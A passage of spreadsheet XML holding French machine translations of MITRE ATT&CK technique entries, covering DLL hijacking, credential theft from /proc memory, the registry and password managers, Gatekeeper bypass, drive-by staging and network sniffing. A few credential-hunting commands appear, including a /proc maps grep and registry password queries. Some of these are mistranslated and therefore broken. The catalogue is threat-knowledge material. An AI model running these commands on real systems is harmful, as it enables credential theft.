Les adversaires peuvent également modifier directement l’ordre de recherche via la redirection DLL, qui, après avoir été activée (dans le registre et la création d’un fichier de redirection), peut amener un programme à charger une DLL différente. (Citation : Redirection de la bibliothèque Microsoft Dynamic-Link)(Citation : Manifestes Microsoft)(Citation : Détournement d’ordre de recherche DLL FireEye)
Si un programme vulnérable à l’ordre de recherche est configuré pour s’exécuter à un niveau de privilège supérieur, la DLL contrôlée par l’adversaire qui est chargée sera également exécutée au niveau supérieur. Dans ce cas, la technique peut être utilisée pour l’élévation de privilèges de l’utilisateur à l’administrateur ou du SYSTÈME ou de l’administrateur au SYSTÈME, selon le programme. Les programmes victimes d’un détournement de chemin peuvent sembler se comporter normalement, car les DLL malveillantes peuvent être configurées pour charger également les DLL légitimes qu’elles étaient censées remplacer.
https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>Une fois établi au sein d’un système ou d’un réseau, un adversaire peut utiliser des techniques automatisées pour collecter des données internes. Les méthodes d’exécution de cette technique peuvent inclure l’utilisation d’un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059) pour rechercher et copier des informations correspondant à des critères définis tels que le type de fichier, l’emplacement ou le nom à des intervalles de temps spécifiques. 
Dans les environnements basés sur le cloud, les adversaires peuvent également utiliser des API cloud, des pipelines de données, des interfaces de ligne de commande ou des services d’extraction, de transformation et de chargement (ETL) pour collecter automatiquement des données. (Citation : Mandiant UNC3944 SMS Phishing 2023) 
Cette fonctionnalité pourrait également être intégrée dans les outils d’accès à distance. 
Cette technique peut intégrer l’utilisation d’autres techniques telles que [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) et [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) pour identifier et déplacer des fichiers, ainsi que [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) et [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) pour identifier les ressources dans les environnements cloud.
https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des données stockées dans le presse-papiers auprès d’utilisateurs qui copient des informations au sein d’applications ou entre elles. 
Par exemple, sous Windows, les adversaires peuvent accéder aux données du presse-papiers à l’aide &lt;code&gt;de clip.exe&lt;/code&gt; ou &lt;code&gt;de Get-Clipboard&lt;/code&gt;. (Citation : presse-papiers MSDN)(Référence : clip_win_server)(Référence : CISA_AA21_200B) De plus, les adversaires peuvent surveiller, puis remplacer le presse-papiers des utilisateurs par leurs données (par exemple, [Manipulation des données transmises](https://attack.mitre.org/techniques/T1565/002)). (Référence : mining_ruby_reversinglabs)
macOS et Linux ont également des commandes, telles que &lt;code&gt;pbpaste&lt;/code&gt;, pour récupérer le contenu du presse-papiers. (Citation : Opérer avec EmPyre)
https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des informations d’identification à partir du système de fichiers proc ou de '/proc'. Le système de fichiers proc est un pseudo-système de fichiers utilisé comme interface pour les structures de données du noyau pour les systèmes basés sur Linux gérant la mémoire virtuelle. Pour chaque processus, le fichier '/proc/&lt;PID&gt;/maps' montre comment la mémoire est mappée dans l’espace d’adressage virtuel du processus. Et '/proc/&lt;PID&gt;/mem', exposé à des fins de débogage, permet d’accéder à l’espace d’adressage virtuel du processus.( Citation : Picus Labs Proc cump 2022)(Citation : baeldung Linux proc map 2022)
Lors de l’exécution avec des privilèges root, les adversaires peuvent rechercher dans ces emplacements mémoire tous les processus d’un système qui contiennent des modèles indiquant des informations d’identification. Les adversaires peuvent utiliser des modèles d’expression régulière, tels que &lt;code&gt;grep -E « ^[0-9a-f-]* r » /proc/"$pid"/maps | cut -d'' -f 1&lt;/code&gt;, pour rechercher des chaînes fixes dans les structures de mémoire ou les hachages mis en cache. (Citation : système de fichiers proc atomic-red) Lorsqu’ils s’exécutent sans accès privilégié, les processus peuvent toujours afficher leurs propres emplacements de mémoire virtuelle. Certains services ou programmes peuvent enregistrer les informations d’identification en texte clair dans la mémoire du processus. (Citation : MimiPenguin GitHub mai 2017)(Citation : polop linux privEsc gitbook)
S’il s’exécute en tant que navigateur Web ou avec les autorisations d’un navigateur Web, un processus peut rechercher les emplacements '/maps' et '/mem' à la recherche de modèles d’informations d’identification de site Web courants (qui peuvent également être utilisés pour trouver de la mémoire adjacente dans la même structure) dans lesquels des hachages ou des informations d’identification en texte clair peuvent se trouver.
https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, louer ou louer un réseau de systèmes compromis qui peuvent être utilisés lors du ciblage. Un botnet est un réseau de systèmes compromis qui peuvent être chargés d’effectuer des tâches coordonnées. (Référence : Norton Botnet) Les adversaires peuvent acheter un abonnement pour utiliser un botnet existant à partir d’un service de démarrage/stresseur. Lorsqu’ils disposent d’un botnet, les adversaires peuvent effectuer des activités de suivi telles que le [phishing](https://attack.mitre.org/techniques/T1566) ou le déni de service distribué (DDoS) à grande échelle. (Citation : Imperva DDoS à louer)(Citation : Krebs-Anna)(Citation : Krebs-Bazaar)(Citation : Krebs-Booter)
https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent acquérir les informations d’identification des utilisateurs auprès de gestionnaires de mots de passe tiers. (Citation : ise Password Manager février 2019) Les gestionnaires de mots de passe sont des applications conçues pour stocker les informations d’identification de l’utilisateur, normalement dans une base de données cryptée. Les informations d’identification sont généralement accessibles une fois qu’un utilisateur a fourni un mot de passe principal qui déverrouille la base de données. Une fois la base de données déverrouillée, ces informations d’identification peuvent être copiées en mémoire. Ces bases de données peuvent être stockées sous forme de fichiers sur disque. (Citation : ise Password Manager février 2019)
Les adversaires peuvent acquérir les informations d’identification de l’utilisateur à partir de gestionnaires de mots de passe en extrayant le mot de passe principal et/ou les informations d’identification en texte brut de la mémoire. (Citation : FoxIT Wocao, décembre 2019)(Citation : Github KeeThief) Les adversaires peuvent extraire des informations d’identification de la mémoire via [Exploitation pour l’accès aux informations d’identification](https://attack.mitre.org/techniques/T1212). (Référence : NVD CVE-2019-3610)
 Les adversaires peuvent également essayer de forcer brutalement via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) pour obtenir le mot de passe principal d’un gestionnaire de mots de passe. (Citation : Cyberreason Anchor décembre 2019)
https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les attributs de fichier et contourner la fonctionnalité Gatekeeper pour échapper aux invites de l’utilisateur et exécuter des programmes non fiables. Gatekeeper est un ensemble de technologies qui agissent comme une couche du modèle de sécurité d’Apple pour s’assurer que seules les applications de confiance sont exécutées sur un hôte. Gatekeeper a été conçu sur la base de la mise en quarantaine des fichiers dans Snow Leopard (10.6, 2009) et s’est développé pour inclure la signature de code, la conformité aux politiques de sécurité, la notarisation, etc. Gatekeeper traite également les applications qui s’exécutent pour la première fois différemment des applications rouvertes. (Citation : La quarantaine de TheEclecticLightCompany et le drapeau)(Citation : TheEclecticLightCompany notarisation de pomme)
Sur la base d’un système d’opt-in, lorsque des fichiers sont téléchargés, un attribut étendu (xattr) appelé « com.apple.quarantine » (également connu sous le nom d’indicateur de quarantaine) peut être défini sur le fichier par l’application qui effectue le téléchargement. Launch Services ouvre l’application dans un état suspendu. Pour les applications de première exécution avec l’indicateur de quarantaine défini, Gatekeeper exécute les fonctions suivantes :
1. Vérifie l’attribut étendu – Gatekeeper vérifie l’indicateur de quarantaine, puis fournit une invite d’alerte à l’utilisateur pour autoriser ou refuser l’exécution. (Citation : OceanLotus pour OS X)(Citation : 20 outils et techniques courants macOS)
2. Vérifie les politiques système - Gatekeeper vérifie la politique de sécurité du système, permettant l’exécution d’applications téléchargées uniquement à partir de l’App Store ou de l’App Store et des développeurs identifiés.
3. Signature de code – Gatekeeper vérifie si une signature de code valide provient d’un identifiant de développeur Apple.
4. Notarisation - À l’aide de l’API « api.apple-cloudkit.com », Gatekeeper contacte les serveurs Apple pour vérifier ou retirer le ticket de notarisation et s’assurer que le ticket n’est pas révoqué. Les utilisateurs peuvent remplacer la notarisation, ce qui entraînera une invite d’exécution d’une « application non autorisée » et la politique de sécurité sera modifiée.
Les adversaires peuvent contourner un ou plusieurs contrôles de sécurité dans les vérifications Gatekeeper par le biais d’erreurs logiques (par exemple, [Exploitation pour l’évasion de la défense](https://attack.mitre.org/techniques/T1211)), de types de fichiers non vérifiés et de bibliothèques externes. Par exemple, avant macOS 13 Ventura, les vérifications de signature de code et de notarisation n’étaient effectuées qu’au premier lancement, ce qui permettait aux adversaires d’écrire des exécutables malveillants dans des applications précédemment ouvertes afin de contourner les contrôles de sécurité de Gatekeeper. (Citation : contournement du gardien de l’evilbit 2021)(Citation : Manipulation du paquet d’applications Brandon Dalton)
Les applications et les fichiers chargés sur le système à partir d’une clé USB, d’un disque optique, d’un disque dur externe, d’un lecteur partagé sur le réseau local ou à l’aide de la commande curl peuvent ne pas définir l’indicateur de quarantaine. De plus, il est possible d’éviter de définir l’indicateur de quarantaine à l’aide de [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent préparer un environnement opérationnel pour infecter les systèmes qui visitent un site Web au cours de leur navigation normale. Les systèmes de terminaux peuvent être compromis en naviguant sur des sites contrôlés par l’adversaire, comme dans [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Dans de tels cas, le navigateur Web de l’utilisateur est généralement ciblé pour l’exploitation (ne nécessitant souvent aucune interaction supplémentaire de l’utilisateur une fois arrivé sur le site), mais les adversaires peuvent également configurer des sites Web pour un comportement de non-exploitation tel que [Jeton d’accès à l’application](https://attack.mitre.org/techniques/T1550/001). Avant [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), les adversaires doivent mettre en commun les ressources nécessaires pour diffuser cet exploit aux utilisateurs qui naviguent vers un site contrôlé par l’adversaire. Le contenu intempestif peut être hébergé sur une infrastructure contrôlée par l’adversaire qui a été acquise ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou précédemment compromise ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)).
Les adversaires peuvent télécharger ou injecter du contenu Web malveillant, tel que [JavaScript](https://attack.mitre.org/techniques/T1059/007), dans des sites Web. (Citation : FireEye CFR Watering Hole 2012)(Référence : Gallagher 2015) Cela peut se faire de plusieurs façons, notamment :
* Insertion de scripts malveillants dans des pages Web ou d’autres contenus Web contrôlables par l’utilisateur, tels que des messages de forum
* Modification des fichiers de script servis aux sites Web à partir de compartiments de stockage cloud accessibles en écriture publique
* Élaborer des publicités Web malveillantes et acheter de l’espace publicitaire sur un site Web par l’intermédiaire de fournisseurs de publicité légitimes (c’est-à-dire [Malvertising](https://attack.mitre.org/techniques/T1583/008))
En plus de mettre en scène du contenu pour exploiter le navigateur Web d’un utilisateur, les adversaires peuvent également mettre en scène du contenu de script pour profiler le navigateur de l’utilisateur (comme dans [Recueillir des informations sur l’hôte de la victime](https://attack.mitre.org/techniques/T1592)) pour s’assurer qu’il est vulnérable avant de tenter de l’exploiter. (Citation : ATT ScanBox)
Les sites Web compromis par un adversaire et utilisés pour organiser un drive-by peuvent être ceux visités par une communauté spécifique, telle qu’un gouvernement, un secteur particulier ou une région, où l’objectif est de compromettre un utilisateur spécifique ou un groupe d’utilisateurs en fonction d’un intérêt commun. Ce type de campagne ciblée fait référence à une compromission stratégique du Web ou à une attaque de point d’eau.
Les adversaires peuvent acheter des domaines similaires à des domaines légitimes (par exemple : homoglyphes, typosquattage, domaine de premier niveau différent, etc.) lors de l’acquisition d’infrastructures ([Domaines](https://attack.mitre.org/techniques/T1583/001)) pour faciliter la [compromission intempestive](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur les services du système local enregistrés. Les adversaires peuvent obtenir des informations sur les services à l’aide d’outils ainsi que de commandes utilitaires du système d’exploitation telles que &lt;code&gt;sc query&lt;/code&gt;, &lt;code&gt;tasklist /svc&lt;/code&gt;, &lt;code&gt;systemctl --type=service&lt;/code&gt; et &lt;code&gt;net start&lt;/code&gt;.
Les adversaires peuvent utiliser les informations de [System Service Discovery](https://attack.mitre.org/techniques/T1007) lors de la découverte automatique pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>Les adversaires peuvent renifler passivement le trafic réseau pour capturer des informations sur un environnement, y compris le matériel d’authentification transmis sur le réseau. Le reniflage de réseau fait référence à l’utilisation de l’interface réseau d’un système pour surveiller ou capturer des informations envoyées via une connexion filaire ou sans fil. Un adversaire peut placer une interface réseau en mode de promiscuité pour accéder passivement aux données en transit sur le réseau, ou utiliser des ports de portée pour capturer une plus grande quantité de données.
Les données capturées via cette technique peuvent inclure les informations d’identification de l’utilisateur, en particulier celles envoyées via un protocole non sécurisé et non chiffré. Les techniques d’empoisonnement de la résolution de service de noms, telles que [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), peuvent également être utilisées pour capturer des informations d’identification vers des sites Web, des proxys et des systèmes internes en redirigeant le trafic vers un adversaire.
Le reniflage du réseau peut révéler des détails de configuration, tels que les services en cours d’exécution, les numéros de version et d’autres caractéristiques du réseau (par exemple, les adresses IP, les noms d’hôte, les ID VLAN) nécessaires aux activités ultérieures de [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) et/ou d'[Évasion de défense](https://attack.mitre.org/tactics/TA0005). Les adversaires peuvent également utiliser le reniflage du réseau pendant [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) pour acquérir passivement des connaissances supplémentaires sur l’environnement.
Dans les environnements basés sur le cloud, les adversaires peuvent toujours être en mesure d’utiliser les services de mise en miroir du trafic pour détecter le trafic réseau des machines virtuelles. Par exemple, AWS Traffic Mirroring, GCP Packet Mirroring et Azure vTap permettent aux utilisateurs de définir des instances spécifiées à partir desquelles collecter le trafic et des cibles spécifiées auxquelles envoyer le trafic collecté. (Citation : Mise en miroir du trafic AWS)(Citation : Mise en miroir des paquets GCP)(Référence : Azure Virtual Network TAP) Souvent, une grande partie de ce trafic est en texte clair en raison de l’utilisation de la terminaison TLS au niveau de l’équilibreur de charge pour réduire la charge de chiffrement et de déchiffrement du trafic. (Citation : Rhino Security Labs AWS VPC Traffic Mirroring)(Citation : SpecterOps AWS Traffic Mirroring) L’adversaire peut ensuite utiliser des techniques d’exfiltration telles que le transfert de données vers un compte cloud afin d’accéder au trafic reniflé. (Citation : Rhino Security Labs AWS VPC Traffic Mirroring)
Sur les périphériques réseau, les adversaires peuvent effectuer des captures réseau à l’aide des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'monitor capture'. (Référence : US-CERT-TA18-106A)(Référence : capture_embedded_packet_on_software)
https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer, acquérir ou voler des matériaux de signature de code pour signer leurs logiciels malveillants ou leurs outils. La signature de code fournit un niveau d’authenticité sur un binaire de la part du développeur et une garantie que le binaire n’a pas été altéré. (citation : Signature du code Wikipédia) Les certificats utilisés lors d’une opération peuvent être créés, acquis ou volés par l’adversaire. (Citation : Securelist Digital Certificates) (Citation : Symantec Digital Certificates) Contrairement à [Signature de code non valide](https://attack.mitre.org/techniques/T1036/001), cette activité aboutira à une signature valide.
La signature de code pour vérifier le logiciel lors de la première exécution peut être utilisée sur les systèmes Windows et macOS modernes. Il n’est pas utilisé sur Linux en raison de la nature décentralisée de la plate-forme. (citation : Signature du code Wikipédia)(Citation : EclecticLightChecksonEXECodeSigning)
Les certificats de signature de code peuvent être utilisés pour contourner les stratégies de sécurité qui nécessitent l’exécution du code signé sur un système.
https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux données à partir du stockage dans le cloud.
De nombreux fournisseurs IaaS proposent des solutions de stockage d’objets de données en ligne, telles qu’Amazon S3, Azure Storage et Google Cloud Storage. De même, les plates-formes d’entreprise SaaS telles qu’Office 365 et Google Workspace fournissent un stockage de documents basé sur le cloud aux utilisateurs via des services tels que OneDrive et Google Drive, tandis que les fournisseurs d’applications SaaS tels que Slack, Confluence, Salesforce et Dropbox peuvent fournir des solutions de stockage dans le cloud en tant que périphérique ou cas d’utilisation principal de leur plate-forme. 
Dans certains cas, comme pour le stockage cloud basé sur IaaS, il n’existe pas d’application globale (telle que SQL ou Elasticsearch) avec laquelle interagir avec les objets stockés : au lieu de cela, les données de ces solutions sont récupérées directement via l'[API cloud](https://attack.mitre.org/techniques/T1059/009). Dans les applications SaaS, les adversaires peuvent être en mesure de collecter ces données directement à partir d’API ou d’objets de stockage cloud backend, plutôt que via leur application ou interface frontale (c’est-à-dire, [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). 
Les adversaires peuvent collecter des données sensibles à partir de ces solutions de stockage dans le cloud. Les fournisseurs proposent généralement des guides de sécurité pour aider les utilisateurs finaux à configurer les systèmes, bien que les erreurs de configuration soient un problème courant. (Référence : Sécurité Amazon S3, 2019)(Citation : Sécurité du stockage Microsoft Azure, 2019)(Citation : Meilleures pratiques de stockage dans le cloud de Google, 2019) Il y a eu de nombreux incidents où le stockage dans le cloud a été mal sécurisé, généralement en autorisant involontairement l’accès public à des utilisateurs non authentifiés, un accès trop large par tous les utilisateurs, ou même un accès pour toute personne anonyme hors du contrôle du système de gestion des identités et des accès sans même avoir besoin des autorisations utilisateur de base.
Ce libre accès peut exposer divers types de données sensibles, telles que des cartes de crédit, des informations personnellement identifiables ou des dossiers médicaux. (Citation : Trend Micro S3 Exposed PII, 2017)(Citation : Godets Magecart S3 câblés, 2019)(Référence : HIPAA Journal S3 Breach, 2017)(Citation : Rclone-mega-extortion_05_2021)
Les adversaires peuvent également obtenir puis abuser des informations d’identification divulguées à partir de référentiels sources, de journaux ou d’autres moyens afin d’accéder à des objets de stockage dans le cloud.
https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les systèmes afin de manipuler les données au fur et à mesure qu’elles sont consultées et affichées à un utilisateur final, menaçant ainsi l’intégrité des données. (Citation : FireEye APT38 octobre 2018)(Citation : DOJ Lazarus Sony 2018) En manipulant les données d’exécution, les adversaires peuvent tenter d’affecter un processus métier, la compréhension organisationnelle et la prise de décision.
Les adversaires peuvent modifier les fichiers binaires d’application utilisés pour afficher les données afin de provoquer des manipulations d’exécution. Les adversaires peuvent également effectuer [Modifier l’association de fichiers par défaut](https://attack.mitre.org/techniques/T1546/001) et [Mascarade](https://attack.mitre.org/techniques/T1036) pour provoquer un effet similaire. Le type de modification et l’impact qu’elle aura dépendent de l’application et du processus cibles,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https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent effectuer des recherches dans le registre des systèmes compromis à la recherche d’informations d’identification stockées de manière non sécurisée. Le registre Windows stocke des informations de configuration qui peuvent être utilisées par le système ou d’autres programmes. Les adversaires peuvent interroger le registre à la recherche d’informations d’identification et de mots de passe qui ont été stockés pour être utilisés par d’autres programmes ou services. Parfois, ces informations d’identification sont utilisées pour les ouvertures de session automatiques.
Exemples de commandes pour trouver des clés de registre liées aux informations de mot de passe : (Citation : Pentestlab Stored Credentials)
* Ruche de la machine locale : &lt;code&gt;requête reg HKLM /f mot de passe /t REG_SZ /s&lt;/code&gt;
* Ruche de l’utilisateur actuel : &lt;code&gt;requête reg HKCU /f mot de passe /t REG_SZ /s&lt;/code&gt;
https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des dossiers et des lecteurs partagés sur des systèmes distants comme moyen d’identifier les sources d’information à recueillir en tant que précurseur de la collecte et d’identifier les systèmes d’intérêt potentiels pour le mouvement latéral. Les réseaux contiennent souvent des lecteurs et des dossiers réseau partagés qui permettent aux utilisateurs d’accéder à des répertoires de fichiers sur différents systèmes d’un réseau. 
Le partage de fichiers sur un réseau Windows s’effectue via le protocole SMB. (citation : ressource partagée de Wikipédia) (Citation : Dossier partagé TechNet) [Net](https://attack.mitre.org/software/S0039) peut être utilisé pour interroger un système distant sur les lecteurs partagés disponibles à l’aide de la commande &lt;code&gt;net view \\\\remotesystem&lt;/code&gt;. Il peut également être utilisé pour interroger des lecteurs partagés sur le système local à l’aide de &lt;code&gt;net share&lt;/code&gt;. Pour macOS, la commande &lt;code&gt;sharing -l&lt;/code&gt; répertorie tous les points partagés utilisés pour les services smb.
https://attack.mitre.org/techniques/T1135</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de recueillir des informations sur les périphériques et les composants connectés à un système informatique. (Citation : Peripheral Discovery Linux)(Citation : Découverte de périphériques macOS) Les périphériques peuvent inclure des ressources auxiliaires qui prennent en charge diverses fonctionnalités telles que des claviers, des imprimantes, des appareils photo, des lecteurs de cartes à puce ou des dispositifs de stockage amovibles. Les informations peuvent être utilisées pour améliorer leur connaissance du système et de l’environnement du réseau ou peuvent être utilisées pour d’autres actions.
https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>Un adversaire peut tenter d’échapper à l’analyse basée sur l’arborescence des processus en modifiant l’ID de processus parent (PPID) du logiciel malveillant exécuté. Si un logiciel de protection des endpoints exploite la relation « parent-enfant » pour la détection, la rupture de cette relation peut faire en sorte que le comportement de l’adversaire ne soit pas associé à l’activité précédente de l’arborescence des processus. Sur les systèmes Unix, la rupture de cet arbre de processus est une pratique courante pour les administrateurs qui exécutent des logiciels à l’aide de scripts et de programmes. (Citation : 3OHA double-fourche 2022) 
Sur les systèmes Linux, les adversaires peuvent exécuter une série d’appels [API natifs](https://attack.mitre.org/techniques/T1106) pour modifier l’arborescence des processus des logiciels malveillants. Par exemple, les adversaires peuvent exécuter leur charge utile sans aucun argument, appeler deux fois l’appel d’API « fork() », puis faire en sorte que le processus parent se termine. Cela crée un processus petit-fils sans processus parent qui est immédiatement adopté par le processus système « init » (PID 1), qui déconnecte avec succès l’exécution de la charge utile de l’adversaire de son arborescence de processus précédente.
Un autre exemple est l’utilisation de l’appel système « daemon » pour se détacher du processus parent actuel et s’exécuter en arrière-plan. (Citation : Sandfly BPFDoor 2022)(Citation : Microsoft XorDdos Linux Stealth 2022)
https://attack.mitre.org/techniques/T1036/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur la topologie du réseau de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les topologies de réseau peuvent inclure une variété de détails, y compris la disposition physique et/ou logique des environnements réseau externes et internes. Ces informations peuvent également inclure des détails concernant les périphériques réseau (passerelles, routeurs, etc.) et d’autres infrastructures.
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un [hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598). Les informations sur les topologies de réseau peuvent également être exposées à des adversaires via des ensembles de données en ligne ou d’autres ensembles de données accessibles (ex : [Sites Web appartenant à des victimes de recherche](https://attack.mitre.org/techniques/T1594)). (Citation : benne à ordures DNS) La collecte de ces informations peut révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596) ou [Rechercher dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des certificats de signature de code auto-signés qui peuvent être utilisés lors du ciblage. La signature de code est le processus de signature numérique d’exécutables et de scripts pour confirmer l’auteur du logiciel et garantir que le code n’a pas été modifié ou corrompu. La signature de code fournit un niveau d’authenticité pour un programme de la part du développeur et une garantie que le programme n’a pas été altéré. (citation : Signature du code Wikipédia) Les utilisateurs et/ou les outils de sécurité peuvent faire plus confiance à un morceau de code signé qu’à un morceau de code non signé, même s’ils ne savent pas qui a émis le certificat ou qui en est l’auteur.
Avant [Code Signing](https://attack.mitre.org/techniques/T1553/002), les adversaires peuvent développer des certificats de signature de code auto-signés pour les utiliser dans les opérations.
https://attack.mitre.org/techniques/T1587/002</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</si>
  <si>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Windows implémente les listes de contrôle d’accès de fichiers et de répertoires sous forme de listes de contrôle d’accès discrétionnaires (DACL). (Citation : Microsoft DACL mai 2018) À l’instar d’une liste de contrôle d’accès standard, les DACL identifient les comptes dont l’accès à un objet sécurisable est autorisé ou refusé. Lorsqu’une tentative d’accès à un objet sécurisable est effectuée, le système vérifie les entrées de contrôle d’accès dans la DACL dans l’ordre. Si une entrée correspondante est trouvée, l’accès à l’objet est accordé. Dans le cas contraire, l’accès est refusé. (Citation : Listes de contrôle d’accès Microsoft mai 2018)
Les adversaires peuvent interagir avec les DACL à l’aide de commandes Windows intégrées, telles que « icacls », « cacls », « takeown » et « attrib », qui peuvent accorder aux adversaires des autorisations plus élevées sur des fichiers et des dossiers spécifiques. De plus, [PowerShell](https://attack.mitre.org/techniques/T1059/001) fournit des applets de commande qui peuvent être utilisées pour récupérer ou modifier des DACL de fichiers et de répertoires. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Fonctionnalités d’accessibilité](https://attack.mitre.org/techniques/T1546/008), [Scripts d’initialisation de démarrage ou de connexion](https://attack.mitre.org/techniques/T1037), ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des compléments Microsoft Office pour obtenir la persistance sur un système compromis. Les compléments Office peuvent être utilisés pour ajouter des fonctionnalités aux programmes Office. (Citation : Compléments Microsoft Office) Il existe différents types de compléments qui peuvent être utilisés par les différents produits Office ; y compris les bibliothèques de compléments Word/Excel (WLL/XLL), les compléments VBA, les compléments COM (Office Component Object Model), les compléments d’automatisation, l’éditeur VBA (VBE), les compléments Visual Studio Tools pour Office (VSTO) et les compléments Outlook. (Citation : Compléments de persistance de MRWLabs Office)(Référence : FireEye Mail CDS 2018)
Les compléments peuvent être utilisés pour obtenir la persistance, car ils peuvent être configurés pour exécuter du code au démarrage d’une application Office.
https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des agents de transport Microsoft pour établir un accès persistant aux systèmes. Les agents de transport Microsoft Exchange peuvent opérer sur les messages électroniques passant par le pipeline de transport pour effectuer diverses tâches telles que le filtrage du courrier indésirable, le filtrage des pièces jointes malveillantes, la journalisation ou l’ajout d’une signature d’entreprise à la fin de tous les e-mails sortants. (Référence : Microsoft TransportAgent juin 2016)(Citation : ESET LightNeuron mai 2019) Les agents de transport peuvent être écrits par les développeurs d’applications, puis compilés dans des assemblys .NET qui sont ensuite inscrits auprès du serveur Exchange. Les agents de transport seront appelés au cours d’une étape spécifiée du traitement des e-mails et exécuteront des tâches définies par le développeur. 
Les adversaires peuvent inscrire un agent de transport malveillant pour fournir un mécanisme de persistance dans Exchange Server qui peut être déclenché par des événements de courrier électronique spécifiés par l’adversaire. (Citation : ESET LightNeuron mai 2019) Bien qu’un agent de transport malveillant puisse être appelé pour tous les e-mails passant par le pipeline de transport Exchange, l’agent peut être configuré pour n’effectuer que des tâches spécifiques en réponse à des critères définis par l’adversaire. Par exemple, l’agent de transport ne peut effectuer une action telle que la copie des pièces jointes en transit et leur sauvegarde en vue d’une exfiltration ultérieure que si l’adresse e-mail du destinataire correspond à une entrée d’une liste fournie par l’adversaire.
https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>Un adversaire peut tenter d’obtenir des informations détaillées sur le système d’exploitation et le matériel, y compris la version, les correctifs, les correctifs, les Service Packs et l’architecture. Les adversaires peuvent utiliser les informations de la [Découverte des informations système](https://attack.mitre.org/techniques/T1082) lors de la découverte automatique pour façonner les comportements de suivi, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Des outils tels que [Systeminfo](https://attack.mitre.org/software/S0096) peuvent être utilisés pour collecter des informations détaillées sur le système. Si vous utilisez un accès privilégié, une répartition des données système peut être collectée via l’outil de configuration du &lt;code&gt;système&lt;/code&gt; sur macOS. À titre d’exemple, les adversaires disposant d’un accès au niveau de l’utilisateur peuvent exécuter la commande &lt;code&gt;df -aH&lt;/code&gt; pour obtenir les disques actuellement montés et l’espace libre disponible associé. Les adversaires peuvent également exploiter une [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) sur les périphériques réseau pour collecter des informations détaillées sur le système (par exemple, &lt;code&gt;afficher la version&lt;/code&gt;). (Référence : US-CERT-TA18-106A) [Découverte des informations système](https://attack.mitre.org/techniques/T1082) combiné aux informations recueillies lors d’autres formes de découverte et de reconnaissance peut favoriser le développement et la dissimulation de la charge utile. (Référence : OSX. FairyTale)(Citation : 20 outils et techniques courants macOS)
Les fournisseurs de cloud d’infrastructure en tant que service (IaaS) tels que AWS, GCP et Azure permettent d’accéder aux informations d’instance et de machine virtuelle via des API. Les appels d’API authentifiés réussis peuvent renvoyer des données telles que le système d’exploitation, la plate-forme et l’état d’une instance particulière ou la vue du modèle d’une machine virtuelle. (citation : Amazon Describe Instance)(citation : ressource Google Instances)(Citation : Microsoft Virutal Machine API)
https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
